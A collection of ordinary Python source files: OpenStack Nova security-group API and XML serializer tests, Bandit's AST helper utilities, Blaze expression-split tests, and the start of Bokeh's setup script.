'group_id': self.sg1['id']
}
self.controller.create(req, {'security_group_rule': rule})
rule = {
'ip_protocol': 'tcp', 'from_port': '121', 'to_port': '121',
'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
}
self.assertRaises(exception.SecurityGroupLimitExceeded,
self.controller.create,
req, {'security_group_rule': rule})
def test_create_rule_cidr_allow_all(self):
rule = security_group_rule_template(cidr='0.0.0.0/0',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEquals(security_group_rule['id'], 0)
self.assertEquals(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEquals(security_group_rule['ip_range']['cidr'],
"0.0.0.0/0")
def test_create_rule_cidr_allow_some(self):
rule = security_group_rule_template(cidr='15.0.0.0/8',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEquals(security_group_rule['id'], 0)
self.assertEquals(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEquals(security_group_rule['ip_range']['cidr'],
"15.0.0.0/8")
def test_create_rule_cidr_bad_netmask(self):
rule = security_group_rule_template(cidr='15.0.0.0/0')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
class TestSecurityGroupRulesXMLDeserializer(test.TestCase):
def setUp(self):
super(TestSecurityGroupRulesXMLDeserializer, self).setUp()
self.deserializer = security_groups.SecurityGroupRulesXMLDeserializer()
def test_create_request(self):
serial_request = """
<security_group_rule>
<parent_group_id>12</parent_group_id>
<from_port>22</from_port>
<to_port>22</to_port>
<group_id></group_id>
<ip_protocol>tcp</ip_protocol>
<cidr>10.0.0.0/24</cidr>
</security_group_rule>"""
request = self.deserializer.deserialize(serial_request)
expected = {
"security_group_rule": {
"parent_group_id": "12",
"from_port": "22",
"to_port": "22",
"ip_protocol": "tcp",
"group_id": "",
"cidr": "10.0.0.0/24",
},
}
self.assertEquals(request['body'], expected)
def test_create_no_protocol_request(self):
serial_request = """
<security_group_rule>
<parent_group_id>12</parent_group_id>
<from_port>22</from_port>
<to_port>22</to_port>
<group_id></group_id>
<cidr>10.0.0.0/24</cidr>
</security_group_rule>"""
request = self.deserializer.deserialize(serial_request)
expected = {
"security_group_rule": {
"parent_group_id": "12",
"from_port": "22",
"to_port": "22",
"group_id": "",
"cidr": "10.0.0.0/24",
},
}
self.assertEquals(request['body'], expected)
def test_corrupt_xml(self):
"""Should throw a 400 error on corrupt xml."""
self.assertRaises(
exception.MalformedRequestBody,
self.deserializer.deserialize,
utils.killer_xml_body())
class TestSecurityGroupXMLDeserializer(test.TestCase):
def setUp(self):
super(TestSecurityGroupXMLDeserializer, self).setUp()
self.deserializer = security_groups.SecurityGroupXMLDeserializer()
def test_create_request(self):
serial_request = """
<security_group name="test">
<description>test</description>
</security_group>"""
request = self.deserializer.deserialize(serial_request)
expected = {
"security_group": {
"name": "test",
"description": "test",
},
}
self.assertEquals(request['body'], expected)
def test_create_no_description_request(self):
serial_request = """
<security_group name="test">
</security_group>"""
request = self.deserializer.deserialize(serial_request)
expected = {
"security_group": {
"name": "test",
},
}
self.assertEquals(request['body'], expected)
def test_create_no_name_request(self):
serial_request = """
<security_group>
<description>test</description>
</security_group>"""
request = self.deserializer.deserialize(serial_request)
expected = {
"security_group": {
"description": "test",
},
}
self.assertEquals(request['body'], expected)
def test_corrupt_xml(self):
"""Should throw a 400 error on corrupt xml."""
self.assertRaises(
exception.MalformedRequestBody,
self.deserializer.deserialize,
utils.killer_xml_body())
class TestSecurityGroupXMLSerializer(test.TestCase):
def setUp(self):
super(TestSecurityGroupXMLSerializer, self).setUp()
self.namespace = wsgi.XMLNS_V11
self.rule_serializer = security_groups.SecurityGroupRuleTemplate()
self.index_serializer = security_groups.SecurityGroupsTemplate()
self.default_serializer = security_groups.SecurityGroupTemplate()
def _tag(self, elem):
tagname = elem.tag
self.assertEqual(tagname[0], '{')
tmp = tagname.partition('}')
namespace = tmp[0][1:]
self.assertEqual(namespace, self.namespace)
return tmp[2]
def _verify_security_group_rule(self, raw_rule, tree):
self.assertEqual(raw_rule['id'], tree.get('id'))
self.assertEqual(raw_rule['parent_group_id'],
tree.get('parent_group_id'))
seen = set()
expected = set(['ip_protocol', 'from_port', 'to_port',
'group', 'group/name', 'group/tenant_id',
'ip_range', 'ip_range/cidr'])
for child in tree:
child_tag = self._tag(child)
self.assertTrue(child_tag in raw_rule)
seen.add(child_tag)
if child_tag in ('group', 'ip_range'):
for gr_child in child:
gr_child_tag = self._tag(gr_child)
self.assertTrue(gr_child_tag in raw_rule[child_tag])
seen.add('%s/%s' % (child_tag, gr_child_tag))
self.assertEqual(gr_child.text,
raw_rule[child_tag][gr_child_tag])
else:
self.assertEqual(child.text, raw_rule[child_tag])
self.assertEqual(seen, expected)
def _verify_security_group(self, raw_group, tree):
rules = raw_group['rules']
self.assertEqual('security_group', self._tag(tree))
self.assertEqual(raw_group['id'], tree.get('id'))
self.assertEqual(raw_group['tenant_id'], tree.get('tenant_id'))
self.assertEqual(raw_group['name'], tree.get('name'))
self.assertEqual(2, len(tree))
for child in tree:
child_tag = self._tag(child)
if child_tag == 'rules':
self.assertEqual(2, len(child))
for idx, gr_child in enumerate(child):
self.assertEqual(self._tag(gr_child), 'rule')
self._verify_security_group_rule(rules[idx], gr_child)
else:
self.assertEqual('description', child_tag)
self.assertEqual(raw_group['description'], child.text)
def test_rule_serializer(self):
raw_rule = dict(
id='123',
parent_group_id='456',
ip_protocol='tcp',
from_port='789',
to_port='987',
group=dict(name='group', tenant_id='tenant'),
ip_range=dict(cidr='10.0.0.0/8'))
rule = dict(security_group_rule=raw_rule)
text = self.rule_serializer.serialize(rule)
tree = etree.fromstring(text)
self.assertEqual('security_group_rule', self._tag(tree))
self._verify_security_group_rule(raw_rule, tree)
def test_group_serializer(self):
rules = [dict(
id='123',
parent_group_id='456',
ip_protocol='tcp',
from_port='789',
to_port='987',
group=dict(name='group1', tenant_id='tenant1'),
ip_range=dict(cidr='10.55.44.0/24')),
dict(
id='654',
parent_group_id='321',
ip_protocol='udp',
from_port='234',
to_port='567',
group=dict(name='group2', tenant_id='tenant2'),
ip_range=dict(cidr='10.44.55.0/24'))]
raw_group = dict(
id='890',
description='description',
name='name',
tenant_id='tenant',
rules=rules)
sg_group = dict(security_group=raw_group)
text = self.default_serializer.serialize(sg_group)
tree = etree.fromstring(text)
self._verify_security_group(raw_group, tree)
def test_groups_serializer(self):
rules = [dict(
id='123',
parent_group_id='1234',
ip_protocol='tcp',
from_port='12345',
to_port='123456',
group=dict(name='group1', tenant_id='tenant1'),
ip_range=dict(cidr='10.123.0.0/24')),
dict(
id='234',
parent_group_id='2345',
ip_protocol='udp',
from_port='23456',
to_port='234567',
group=dict(name='group2', tenant_id='tenant2'),
ip_range=dict(cidr='10.234.0.0/24')),
dict(
id='345',
parent_group_id='3456',
ip_protocol='tcp',
from_port='34567',
to_port='345678',
group=dict(name='group3', tenant_id='tenant3'),
ip_range=dict(cidr='10.345.0.0/24')),
dict(
id='456',
parent_group_id='4567',
ip_protocol='udp',
from_port='45678',
to_port='456789',
group=dict(name='group4', tenant_id='tenant4'),
ip_range=dict(cidr='10.456.0.0/24'))]
groups = [dict(
id='567',
description='description1',
name='name1',
tenant_id='tenant1',
rules=rules[0:2]),
dict(
id='678',
description='description2',
name='name2',
tenant_id='tenant2',
rules=rules[2:4])]
sg_groups = dict(security_groups=groups)
text = self.index_serializer.serialize(sg_groups)
tree = etree.fromstring(text)
self.assertEqual('security_groups', self._tag(tree))
self.assertEqual(len(groups), len(tree))
for idx, child in enumerate(tree):
self._verify_security_group(groups[idx], child)
UUID1 = '00000000-0000-0000-0000-000000000001'
UUID2 = '00000000-0000-0000-0000-000000000002'
UUID3 = '00000000-0000-0000-0000-000000000003'
def fake_compute_get_all(*args, **kwargs):
return [
fakes.stub_instance(1, uuid=UUID1,
security_groups=[{'name': 'fake-0-0'},
{'name': 'fake-0-1'}]),
fakes.stub_instance(2, uuid=UUID2,
security_groups=[{'name': 'fake-1-0'},
{'name': 'fake-1-1'}])
]
def fake_compute_get(*args, **kwargs):
return fakes.stub_instance(1, uuid=UUID3,
security_groups=[{'name': 'fake-2-0'},
{'name': 'fake-2-1'}])
def fake_compute_create(*args, **kwargs):
return ([fake_compute_get()], '')
def fake_get_instances_security_groups_bindings(inst, context):
return {UUID1: [{'name': 'fake-0-0'}, {'name': 'fake-0-1'}],
UUID2: [{'name': 'fake-1-0'}, {'name': 'fake-1-1'}]}
class SecurityGroupsOutputTest(test.TestCase):
content_type = 'application/json'
def setUp(self):
super(SecurityGroupsOutputTest, self).setUp()
self.controller = security_groups.SecurityGroupController()
fakes.stub_out_nw_api(self.stubs)
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
self.stubs.Set(compute.api.API, 'get_all', fake_compute_get_all)
self.stubs.Set(compute.api.API, 'create', fake_compute_create)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Security_groups'])
def _make_request(self, url, body=None):
req = webob.Request.blank(url)
if body:
req.method = 'POST'
req.body = self._encode_body(body)
req.content_type = self.content_type
req.headers['Accept'] = self.content_type
res = req.get_response(fakes.wsgi_app(init_only=('servers',)))
return res
def _encode_body(self, body):
return jsonutils.dumps(body)
def _get_server(self, body):
return jsonutils.loads(body).get('server')
def _get_servers(self, body):
return jsonutils.loads(body).get('servers')
def _get_groups(self, server):
return server.get('security_groups')
def test_create(self):
url = '/v2/fake/servers'
image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)
res = self._make_request(url, {'server': server})
self.assertEqual(res.status_int, 202)
server = self._get_server(res.body)
for i, group in enumerate(self._get_groups(server)):
name = 'fake-2-%s' % i
self.assertEqual(group.get('name'), name)
def test_show(self):
url = '/v2/fake/servers/%s' % UUID3
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
server = self._get_server(res.body)
for i, group in enumerate(self._get_groups(server)):
name = 'fake-2-%s' % i
self.assertEqual(group.get('name'), name)
def test_detail(self):
url = '/v2/fake/servers/detail'
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
for i, server in enumerate(self._get_servers(res.body)):
for j, group in enumerate(self._get_groups(server)):
name = 'fake-%s-%s' % (i, j)
self.assertEqual(group.get('name'), name)
def test_no_instance_passthrough_404(self):
def fake_compute_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
url = '/v2/fake/servers/70f6db34-de8d-4fbd-aafb-4065bdfa6115'
res = self._make_request(url)
self.assertEqual(res.status_int, 404)
class SecurityGroupsOutputXmlTest(SecurityGroupsOutputTest):
content_type = 'application/xml'
class MinimalCreateServerTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server', selector='server')
root.set('name')
root.set('id')
root.set('imageRef')
root.set('flavorRef')
return xmlutil.MasterTemplate(root, 1,
nsmap={None: xmlutil.XMLNS_V11})
def _encode_body(self, body):
serializer = self.MinimalCreateServerTemplate()
return serializer.serialize(body)
def _get_server(self, body):
return etree.XML(body)
def _get_servers(self, body):
return etree.XML(body).getchildren()
def _get_groups(self, server):
# NOTE(vish): we are adding security groups without an extension
# namespace so we don't break people using the existing
# functionality, but that means we need to use find with
# the existing server namespace.
namespace = server.nsmap[None]
return server.find('{%s}security_groups' % namespace).getchildren()
| |
# -*- coding:utf-8 -*-
#
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import _ast
import ast
import os.path
import symtable
"""Various helper functions."""
def ast_args_to_str(args):
res = ('\n\tArgument/s:\n\t\t%s' %
'\n\t\t'.join([ast.dump(arg) for arg in args]))
return res
def _get_attr_qual_name(node, aliases):
'''Get a the full name for the attribute node.
This will resolve a pseudo-qualified name for the attribute
rooted at node as long as all the deeper nodes are Names or
Attributes. This will give you how the code referenced the name but
will not tell you what the name actually refers to. If we
encounter a node without a static name we punt with an
empty string. If this encounters something more comples, such as
foo.mylist[0](a,b) we just return empty string.
:param node: AST Name or Attribute node
:param aliases: Import aliases dictionary
:returns: Qualified name refered to by the attribute or name.
'''
if type(node) == _ast.Name:
if node.id in aliases:
return aliases[node.id]
return node.id
elif type(node) == _ast.Attribute:
name = '%s.%s' % (_get_attr_qual_name(node.value, aliases), node.attr)
if name in aliases:
return aliases[name]
return name
else:
return ""
def get_call_name(node, aliases):
if type(node.func) == _ast.Name:
if deepgetattr(node, 'func.id') in aliases:
return aliases[deepgetattr(node, 'func.id')]
return(deepgetattr(node, 'func.id'))
elif type(node.func) == _ast.Attribute:
return _get_attr_qual_name(node.func, aliases)
else:
return ""
def get_func_name(node):
return node.name # TODO(tkelsey): get that qualname using enclosing scope
def get_qual_attr(node, aliases):
prefix = ""
if type(node) == _ast.Attribute:
try:
val = deepgetattr(node, 'value.id')
if val in aliases:
prefix = aliases[val]
else:
prefix = deepgetattr(node, 'value.id')
except Exception:
# NOTE(tkelsey): degrade gracefully when we cant get the fully
# qualified name for an attr, just return its base name.
pass
return("%s.%s" % (prefix, node.attr))
else:
return "" # TODO(tkelsey): process other node types
def deepgetattr(obj, attr):
"""Recurses through an attribute chain to get the ultimate value."""
for key in attr.split('.'):
obj = getattr(obj, key)
return obj
def describe_symbol(sym):
assert type(sym) == symtable.Symbol
print("Symbol:", sym.get_name())
for prop in [
'referenced', 'imported', 'parameter',
'global', 'declared_global', 'local',
'free', 'assigned', 'namespace']:
if getattr(sym, 'is_' + prop)():
print(' is', prop)
def lines_with_context(line_no, line_range, max_lines, file_len):
'''Get affected lines, plus context
This function takes a list of line numbers, adds one line
before the specified range, and two lines after, to provide
a bit more context. It then limits the number of lines to
the specified max_lines value.
:param line_no: The line of interest (trigger line)
:param line_range: The lines that make up the whole statement
:param max_lines: The maximum number of lines to output
:return l_range: A list of line numbers to output
'''
# Catch a 0 or negative max lines, don't display any code
if max_lines == 0:
return []
l_range = sorted(line_range)
# add one line before before and after, to make sure we don't miss
# any context.
l_range.append(l_range[-1] + 1)
l_range.append(l_range[0] - 1)
l_range = sorted(l_range)
if max_lines < 0:
return l_range
# limit scope to max_lines
if len(l_range) > max_lines:
# figure out a sane distribution of scope (extra lines after)
after = (max_lines - 1) / 2
before = max_lines - (after + 1)
target = l_range.index(line_no)
# skew things if the code is at the start or end of the statement
if before > target:
extra = before - target
before = target
after += extra
gap = file_len - (target + 1)
if gap < after:
extra = after - gap
after = gap
before += extra
# find start
if before >= target:
start = 0
else:
start = target - before
# find end
if target + after > len(l_range) - 1:
end = len(l_range) - 1
else:
end = target + after
# slice line array
l_range = l_range[start:end + 1]
return l_range
class InvalidModulePath(Exception):
pass
def get_module_qualname_from_path(path):
'''Get the module's qualified name by analysis of the path.
Resolve the absolute pathname and eliminate symlinks. This could result in
an incorrect name if symlinks are used to restructure the python lib
directory.
Starting from the right-most directory component look for __init__.py in
the directory component. If it exists then the directory name is part of
the module name. Move left to the subsequent directory components until a
directory is found without __init__.py.
:param: Path to module file. Relative paths will be resolved relative to
current working directory.
:return: fully qualified module name
'''
(head, tail) = os.path.split(path)
if head == '' or tail == '':
raise InvalidModulePath('Invalid python file path: "%s"'
' Missing path or file name' % (path))
qname = [os.path.splitext(tail)[0]]
while head != '/':
if os.path.isfile(os.path.join(head, '__init__.py')):
(head, tail) = os.path.split(head)
qname.insert(0, tail)
else:
break
qualname = '.'.join(qname)
return qualname
def namespace_path_join(base, name):
'''Extend the current namespace path with an additional name
Take a namespace path (i.e., package.module.class) and extends it
with an additional name (i.e., package.module.class.subclass).
This is similar to how os.path.join works.
:param base: (String) The base namespace path.
:param name: (String) The new name to append to the base path.
:returns: (String) A new namespace path resulting from combination of
base and name.
'''
return '%s.%s' % (base, name)
def namespace_path_split(path):
'''Split the namespace path into a pair (head, tail).
Tail will be the last namespace path component and head will
be everything leading up to that in the path. This is similar to
os.path.split.
:param path: (String) A namespace path.
:returns: (String, String) A tuple where the first component is the base
path and the second is the last path component.
'''
return tuple(path.rsplit('.', 1))
def safe_unicode(obj, *args):
'''return the unicode representation of obj.'''
try:
return unicode(obj, *args)
except UnicodeDecodeError:
# obj is byte string
ascii_text = str(obj).encode('string_escape')
return unicode(ascii_text)
def safe_str(obj):
'''return the byte string representation of obj.'''
try:
return str(obj)
except UnicodeEncodeError:
# obj is unicode
return unicode(obj).encode('unicode_escape')
def linerange(node):
"""Get line number range from a node."""
strip = {"body": None, "orelse": None,
"handlers": None, "finalbody": None}
fields = dir(node)
for key in strip.keys():
if key in fields:
strip[key] = getattr(node, key)
setattr(node, key, [])
lines = set()
for n in ast.walk(node):
if hasattr(n, 'lineno'):
lines.add(n.lineno)
for key in strip.keys():
if strip[key] is not None:
setattr(node, key, strip[key])
if len(lines):
return range(min(lines), max(lines) + 1)
return [0, 1]
def linerange_fix(node):
"""Try and work around a known Python bug with multi-line strings."""
# deal with multiline strings lineno behavior (Python issue #16806)
lines = linerange(node)
if hasattr(node, 'sibling') and hasattr(node.sibling, 'lineno'):
start = min(lines)
delta = node.sibling.lineno - start
if delta > 1:
return range(start, node.sibling.lineno)
return lines
def concat_string(node, stop=None):
'''Builds a string from a ast.BinOp chain.
This will build a string from a series of ast.Str nodes wrapped in
ast.BinOp nodes. Somthing like "a" + "b" + "c" or "a %s" % val etc.
The provided node can be any participant in the BinOp chain.
:param node: (ast.Str or ast.BinOp) The node to process
:param stop: (ast.Str or ast.BinOp) Optional base node to stop at
:returns: (Tuple) the root node of the expression, the string value
'''
def _get(node, bits, stop=None):
if node != stop:
bits.append(
_get(node.left, bits, stop)
if isinstance(node.left, ast.BinOp)
else node.left)
bits.append(
_get(node.right, bits, stop)
if isinstance(node.right, ast.BinOp)
else node.right)
bits = [node]
while isinstance(node.parent, ast.BinOp):
node = node.parent
if isinstance(node, ast.BinOp):
_get(node, bits, stop)
return (node, " ".join([x.s for x in bits if isinstance(x, ast.Str)]))
def get_called_name(node):
'''Get a function name from an ast.Call node.
An ast.Call node representing a method call with present differently to one
wrapping a function call: thing.call() vs call(). This helper will grab the
unqualified call name correctly in either case.
:param node: (ast.Call) the call node
:returns: (String) the function name
'''
func = node.func
return (func.attr if isinstance(func, ast.Attribute) else func.id)
| |
from blaze.expr import *
from blaze.expr.split import *
from datashape import dshape
from datashape.predicates import isscalar, isrecord, iscollection
t = symbol('t', 'var * {name: string, amount: int32, id: int32}')
a = symbol('a', '1000 * 2000 * {x: float32, y: float32}')
def test_path_split():
expr = t.amount.sum() + 1
assert path_split(t, expr).isidentical(t.amount.sum())
expr = t.amount.distinct().sort()
assert path_split(t, expr).isidentical(t.amount.distinct())
t2 = transform(t, id=t.id * 2)
expr = by(t2.id, amount=t2.amount.sum()).amount + 1
assert path_split(t, expr).isidentical(by(t2.id, amount=t2.amount.sum()))
expr = count(t.amount.distinct())
assert path_split(t, expr).isidentical(t.amount.distinct())
expr = summary(total=t.amount.sum())
assert path_split(t, expr).isidentical(expr)
def test_sum():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.sum())
assert chunk.schema == t.schema
assert chunk_expr.isidentical(chunk.amount.sum(keepdims=True))
assert isscalar(agg.dshape.measure)
assert agg_expr.isidentical(sum(agg))
def test_mean():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.mean())
assert chunk.schema == t.schema
assert chunk_expr.isidentical(summary(total=chunk.amount.sum(),
count=chunk.amount.count(),
keepdims=True))
assert isrecord(agg.dshape.measure)
assert agg_expr.isidentical(agg.total.sum() / agg.count.sum())
def test_var():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.var())
assert chunk.schema == t.schema
assert chunk_expr.isidentical(summary(x=chunk.amount.sum(),
x2=(chunk.amount**2).sum(),
n=chunk.amount.count(),
keepdims=True))
assert isrecord(agg.dshape.measure)
assert agg_expr.isidentical((agg.x2.sum() / (agg.n.sum())
- (agg.x.sum() / (agg.n.sum())) ** 2))
def test_std():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.std())
assert chunk.schema == t.schema
assert chunk_expr.isidentical(summary(x=chunk.amount.sum(),
x2=(chunk.amount**2).sum(),
n=chunk.amount.count(),
keepdims=True))
assert isrecord(agg.dshape.measure)
assert agg_expr.isidentical(sqrt((agg.x2.sum() / (agg.n.sum())
- (agg.x.sum() / (agg.n.sum())) ** 2)))
def test_sum_with_axis_argument():
chunk = symbol('chunk', '100 * 100 * {x: float32, y: float32}')
(chunk, chunk_expr), (agg, agg_expr) = split(a, a.x.sum(axis=0), chunk=chunk)
assert chunk.schema == a.schema
assert agg_expr.dshape == a.x.sum(axis=0).dshape
assert chunk_expr.isidentical(chunk.x.sum(axis=0, keepdims=True))
assert agg_expr.isidentical(agg.sum(axis=0))
def test_sum_with_keepdims():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.sum(keepdims=True))
assert chunk.schema == t.schema
assert chunk_expr.isidentical(chunk.amount.sum(keepdims=True))
assert isscalar(agg.dshape.measure)
assert agg_expr.isidentical(sum(agg, keepdims=True))
def test_split_reasons_correctly_about_uneven_aggregate_shape():
x = symbol('chunk', '10 * 10 * int')
chunk = symbol('chunk', '3 * 3 * int')
(chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(axis=0),
chunk=chunk)
assert agg.shape == (4, 10)
x = symbol('leaf', '1643 * 60 * int')
chunk = symbol('chunk', '40 * 60 * int')
(chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(),
chunk=chunk)
assert agg.shape == (42, 1)
def test_split_reasons_correctly_about_aggregate_shape():
chunk = symbol('chunk', '100 * 100 * {x: float32, y: float32}')
(chunk, chunk_expr), (agg, agg_expr) = split(a, a.x.sum(), chunk=chunk)
assert agg.shape == (10, 20)
chunk = symbol('chunk', '100 * 100 * {x: float32, y: float32}')
(chunk, chunk_expr), (agg, agg_expr) = split(a, a.x.sum(axis=0), chunk=chunk)
assert agg.shape == (10, 2000)
def test_distinct():
(chunk, chunk_expr), (agg, agg_expr) = split(t, count(t.amount.distinct()))
assert chunk.schema == t.schema
assert chunk_expr.isidentical(chunk.amount.distinct())
assert isscalar(agg.dshape.measure)
assert agg_expr.isidentical(count(agg.distinct()))
def test_summary():
(chunk, chunk_expr), (agg, agg_expr) = split(t, summary(a=t.amount.count(),
b=t.id.sum() + 1))
assert chunk.schema == t.schema
assert chunk_expr.isidentical(summary(a=chunk.amount.count(),
b=chunk.id.sum(), keepdims=True))
# assert not agg.schema == dshape('{a: int32, b: int32}')
assert agg_expr.isidentical(summary(a=agg.a.sum(),
b=agg.b.sum() + 1))
(chunk, chunk_expr), (agg, agg_expr) = \
split(t, summary(total=t.amount.sum()))
assert chunk_expr.isidentical(summary(total=chunk.amount.sum(),
keepdims=True))
assert agg_expr.isidentical(summary(total=agg.total.sum()))
def test_summary_with_mean():
(chunk, chunk_expr), (agg, agg_expr) = split(t, summary(a=t.amount.count(),
b=t.id.mean() + 1))
assert chunk.schema == t.schema
assert chunk_expr.isidentical(summary(a=chunk.amount.count(),
b_total=chunk.id.sum(),
b_count=chunk.id.count(), keepdims=True))
# assert not agg.schema == dshape('{a: int32, b: int32}')
expected = summary(a=agg.a.sum(),
b=(agg.b_total.sum() / agg.b_count.sum()) + 1)
assert agg_expr.isidentical(expected)
def test_complex_summaries():
t = symbol('t', '100 * {a: int, b: int}')
(chunk, chunk_expr), (agg, agg_expr) = split(t, summary(q=t.a.mean(),
w=t.a.std(),
e=t.a.sum()))
assert chunk_expr.isidentical(summary(e=chunk.a.sum(),
q_count=chunk.a.count(),
q_total=chunk.a.sum(),
w_n=chunk.a.count(),
w_x=chunk.a.sum(),
w_x2=(chunk.a**2).sum(),
keepdims=True))
expected = summary(e=agg.e.sum(),
q=agg.q_total.sum() / agg.q_count.sum(),
w=sqrt((agg.w_x2.sum() / agg.w_n.sum())
- (agg.w_x.sum() / agg.w_n.sum())**2))
assert agg_expr.isidentical(expected)
def test_by_sum():
(chunk, chunk_expr), (agg, agg_expr) = \
split(t, by(t.name, total=t.amount.sum()))
assert chunk.schema == t.schema
assert chunk_expr.isidentical(by(chunk.name, total=chunk.amount.sum()))
assert not isscalar(agg.dshape.measure)
assert agg_expr.isidentical(by(agg.name, total=agg.total.sum()))
def test_by_count():
(chunk, chunk_expr), (agg, agg_expr) = \
split(t, by(t.name, total=t.amount.count()))
assert chunk_expr.isidentical(by(chunk.name, total=chunk.amount.count()))
assert agg_expr.isidentical(by(agg.name, total=agg.total.sum()))
def test_by_mean():
(chunk, chunk_expr), (agg, agg_expr) = \
split(t, by(t.name, avg=t.amount.mean()))
assert chunk_expr.isidentical(by(chunk.name,
avg_total=chunk.amount.sum(),
avg_count=chunk.amount.count()))
assert agg_expr.isidentical(by(agg.name,
avg=(agg.avg_total.sum() / agg.avg_count.sum())))
def test_embarassing_rowwise():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount + 1)
assert chunk_expr.isidentical(chunk.amount + 1)
assert agg_expr.isidentical(agg)
def test_embarassing_selection():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t[t.amount > 0])
assert chunk_expr.isidentical(chunk[chunk.amount > 0])
assert agg_expr.isidentical(agg)
def test_embarassing_like():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.like(name='Alice*'))
assert chunk_expr.isidentical(chunk.like(name='Alice*'))
assert agg_expr.isidentical(agg)
x = symbol('x', '24 * 16 * int32')
def test_nd_chunk():
c = symbol('c', '4 * 4 * int32')
(chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(), chunk=c)
assert chunk.shape == (4, 4)
assert chunk_expr.isidentical(chunk.sum(keepdims=True))
assert agg.shape == (6, 4)
assert agg_expr.isidentical(agg.sum())
def test_nd_chunk_axis_args():
c = symbol('c', '4 * 4 * int32')
(chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(axis=0), chunk=c)
assert chunk.shape == (4, 4)
assert chunk_expr.shape == (1, 4)
assert chunk_expr.isidentical(chunk.sum(keepdims=True, axis=0))
assert agg.shape == (6, 16)
assert agg_expr.isidentical(agg.sum(axis=0))
for func in [var, std, mean]:
(chunk, chunk_expr), (agg, agg_expr) = split(x, func(x, axis=0), chunk=c)
assert chunk.shape == (4, 4)
assert chunk_expr.shape == (1, 4)
assert agg.shape == (6, 16)
def test_agg_shape_in_tabular_case_with_explicit_chunk():
t = symbol('t', '1000 * {name: string, amount: int, id: int}')
c = symbol('chunk', 100 * t.schema)
expr = by(t.name, total=t.amount.sum())
(chunk, chunk_expr), (agg, agg_expr) = split(t, expr, chunk=c)
assert agg.dshape == dshape('var * {name: string, total: int64}')
def test_reductions():
(chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.nunique())
assert chunk.schema == t.schema
assert chunk_expr.isidentical(chunk.amount.distinct())
assert isscalar(agg.dshape.measure)
assert agg_expr.isidentical(agg.distinct().count())
(chunk, chunk_expr), (agg, agg_expr) = \
split(t, t.amount.nunique(keepdims=True))
assert chunk.schema == t.schema
assert chunk_expr.isidentical(chunk.amount.distinct())
assert isscalar(agg.dshape.measure)
assert agg_expr.isidentical(agg.distinct().count(keepdims=True))
def test_by_with_single_field_child():
x = symbol('x', 'var * int')
(chunk, chunk_expr), (agg, agg_expr) = split(x, by(x, total=x.sum()))
assert chunk_expr.isidentical(by(chunk, total=chunk.sum()))
assert agg_expr.isidentical(by(agg[agg.fields[0]],
total=agg.total.sum()).relabel({agg.fields[0]: 'x'}))
def test_keepdims_equals_true_doesnt_mess_up_agg_shape():
x = symbol('x', '10 * int')
(chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(), keepdims=False)
assert iscollection(agg.dshape)
def test_splittable_apply():
def f(x):
pass
(chunk, chunk_expr), (agg, agg_expr) = \
split(t, t.amount.apply(f, 'var * int', splittable=True))
assert chunk_expr.isidentical(
chunk.amount.apply(f, 'var * int', splittable=True))
assert agg_expr.isidentical(agg)
| |
"""Setup script for Bokeh."""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENCE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
# Stdlib imports
import os, platform, re, shutil, site, subprocess, sys, time
from os.path import abspath, dirname, exists, isdir, join, realpath, relpath
from shutil import copy
import sys
if 'install' in sys.argv and sys.platform.startswith('win'):
# Try use setuptools, so that entry_points is handled, creating a bokeh.exe
try:
import setuptools
except ImportError:
pass
try:
import colorama
def bright(text): return "%s%s%s" % (colorama.Style.BRIGHT, text, colorama.Style.RESET_ALL)
def dim(text): return "%s%s%s" % (colorama.Style.DIM, text, colorama.Style.RESET_ALL)
def white(text): return "%s%s%s" % (colorama.Fore.WHITE, text, colorama.Style.RESET_ALL)
def blue(text): return "%s%s%s" % (colorama.Fore.BLUE, text, colorama.Style.RESET_ALL)
